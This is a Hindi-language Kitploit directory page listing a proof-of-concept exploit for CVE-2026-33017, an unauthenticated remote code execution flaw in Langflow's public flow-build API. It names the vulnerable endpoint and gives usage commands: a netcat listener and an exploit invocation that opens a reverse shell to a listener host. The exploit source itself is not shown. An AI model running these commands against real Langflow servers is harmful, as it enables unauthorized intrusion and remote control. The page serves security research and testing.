Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33017-Langflow-RCE — CVE-2026-33017 एक्सप्लॉइट | द्वारा infrar3d | Kitploit
उपकरण/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce

CVE-2026-33017-Langflow-RCE

CVE-2026-33017 एक्सप्लॉइट | द्वारा infrar3d

रिपॉजिटरी देखें
1111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33017 - Langflow RCE भेद्यता

द्वारा शोषित infrar3d

यह प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Langflow के 1.9.0 से पहले के संस्करणों में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता को लक्षित करता है। यह भेद्यता अप्रमाणित हमलावरों को फ्लो बिल्डिंग API एंडपॉइंट के माध्यम से दुर्भावनापूर्ण Python कोड इंजेक्ट करके मनमानी सिस्टम कमांड निष्पादित करने की अनुमति देती है। भेद्यता /api/v1/build_public_tmp/{flow_id}/flow endpoint में मौजूद है, जो कंपोनेंट टेम्पलेट्स के कोड फील्ड में उपयोगकर्ता द्वारा प्रदान किए गए कोड को अनुचित रूप से सैनिटाइज़ करता है।

उपयोग:

root@kitploit:~
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]

Langflow RCE Exploit

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target base URL
  -f, --flow FLOW  Flow ID
  -H, --host HOST  Listener host for reverse shell
  -P, --port PORT  Listener port (default: 4444)
                                         

उदाहरण:

पहला टर्मिनल (लिसनर):

root@kitploit:~
nc -lvnp 4444

दूसरा टर्मिनल (एक्सप्लॉइट):

root@kitploit:~
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444 

⚠️ अस्वीकरण ⚠️

यह सॉफ्टवेयर और प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

  • लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
  • स्पष्ट पूर्व अनुमति के बिना किसी भी सिस्टम के विरुद्ध उपयोग न करें।
  • सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है।

आप सभी लागू कानूनों का पालन करने के लिए जिम्मेदार हैं। नैतिक और जिम्मेदारीपूर्वक उपयोग करें।

टूल डाउनलोड करें